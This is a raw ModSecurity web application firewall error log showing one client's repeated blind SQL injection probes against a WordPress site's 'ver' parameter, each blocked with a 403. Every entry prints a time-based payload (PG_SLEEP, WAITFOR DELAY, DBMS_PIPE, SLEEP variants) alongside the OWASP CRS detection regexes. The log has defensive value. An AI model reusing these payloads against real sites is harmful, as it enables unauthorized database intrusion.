"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSfcO2IzqYGkif72pMQAAAAM"] [Sun Jul 07 16:19:05.610143 2024] [:error] [pid 30826:tid 139722542221056] [client 141.98.81.37:37850] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSfcO2IzqYGkif72pMgAAAA8"] [Sun Jul 07 16:19:05.927265 2024] [:error] [pid 31926:tid 139722508650240] [client 141.98.81.37:37852] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSXug2jzbr_AlO3dz8wAAANM"] [Sun Jul 07 16:19:06.384057 2024] [:error] [pid 31926:tid 139722575791872] [client 141.98.81.37:37854] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSnug2jzbr_AlO3dz9AAAAMs"] [Sun Jul 07 16:19:06.805024 2024] [:error] [pid 30826:tid 139722651326208] [client 141.98.81.37:37856] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSvcO2IzqYGkif72pMwAAAAI"] [Sun Jul 07 16:19:07.262451 2024] [:error] [pid 30828:tid 139722466686720] [client 141.98.81.37:37858] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSzbJWLg2ecbngu9JagAAAJg"] [Sun Jul 07 16:19:07.726737 2024] [:error] [pid 30828:tid 139722491864832] [client 141.98.81.37:37860] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSzbJWLg2ecbngu9JawAAAJU"] [Sun Jul 07 16:19:08.094546 2024] [:error] [pid 30828:tid 139722567399168] [client 141.98.81.37:37862] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTDbJWLg2ecbngu9JbAAAAIw"] [Sun Jul 07 16:19:08.495624 2024] [:error] [pid 31926:tid 139722609362688] [client 141.98.81.37:37864] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(82)||CHR(122),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTHug2jzbr_AlO3dz9QAAAMc"] [Sun Jul 07 16:19:10.054618 2024] [:error] [pid 31926:tid 139722483472128] [client 141.98.81.37:37866] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(82)||CHR(122),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTnug2jzbr_AlO3dz9gAAANY"] [Sun Jul 07 16:19:10.502055 2024] [:error] [pid 30827:tid 139722600969984] [client 141.98.81.37:37868] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(82)||CHR(122),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTkGuaLybMBNkB61uFwAAAEg"] [Sun Jul 07 16:19:10.731540 2024] [:error] [pid 30827:tid 139722500257536] [client 141.98.81.37:37870] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(82)||CHR(122),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTkGuaLybMBNkB61uGAAAAFQ"] [Sun Jul 07 16:19:10.960100 2024] [:error] [pid 30827:tid 139722466686720] [client 141.98.81.37:37872] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(82)||CHR(122),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGTkGuaLybMBNkB61uGQAAAFg"] [Sun Jul 07 16:19:11.191918 2024] [:error] [pid 31926:tid 139722466686720] [client 141.98.81.37:37874] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47) AND SLEEP(5) AND (6279=6279"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGT3ug2jzbr_AlO3dz9wAAANg"] [Sun Jul 07 16:19:12.739930 2024] [:error] [pid 31926:tid 139722592577280] [client 141.98.81.37:37876] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUHug2jzbr_AlO3dz-AAAAMk"] [Sun Jul 07 16:19:13.186054 2024] [:error] [pid 30828:tid 139722659718912] [client 141.98.81.37:37878] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47') AND SLEEP(5) AND ('NoUe'='NoUe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUTbJWLg2ecbngu9JbQAAAIE"] [Sun Jul 07 16:19:13.421520 2024] [:error] [pid 31926:tid 139722642933504] [client 141.98.81.37:37880] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47' AND SLEEP(5) AND 'VzfZ'='VzfZ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUXug2jzbr_AlO3dz-QAAAMM"] [Sun Jul 07 16:19:13.648371 2024] [:error] [pid 31926:tid 139722651326208] [client 141.98.81.37:37882] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUXug2jzbr_AlO3dz-gAAAMI"] [Sun Jul 07 16:19:13.877292 2024] [:error] [pid 31926:tid 139722659718912] [client 141.98.81.37:37884] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)-- nVtF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUXug2jzbr_AlO3dz-wAAAME"] [Sun Jul 07 16:19:14.131238 2024] [:error] [pid 30827:tid 139722567399168] [client 141.98.81.37:37886] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47) AND 9123=(SELECT 9123 FROM PG_SLEEP(5)) AND (7216=7216"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUkGuaLybMBNkB61uGgAAAEw"] [Sun Jul 07 16:19:14.420429 2024] [:error] [pid 31926:tid 139722626148096] [client 141.98.81.37:37888] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 9123=(SELECT 9123 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUnug2jzbr_AlO3dz_AAAAMU"] [Sun Jul 07 16:19:14.842761 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:37890] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47') AND 9123=(SELECT 9123 FROM PG_SLEEP(5)) AND ('CaYX'='CaYX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] 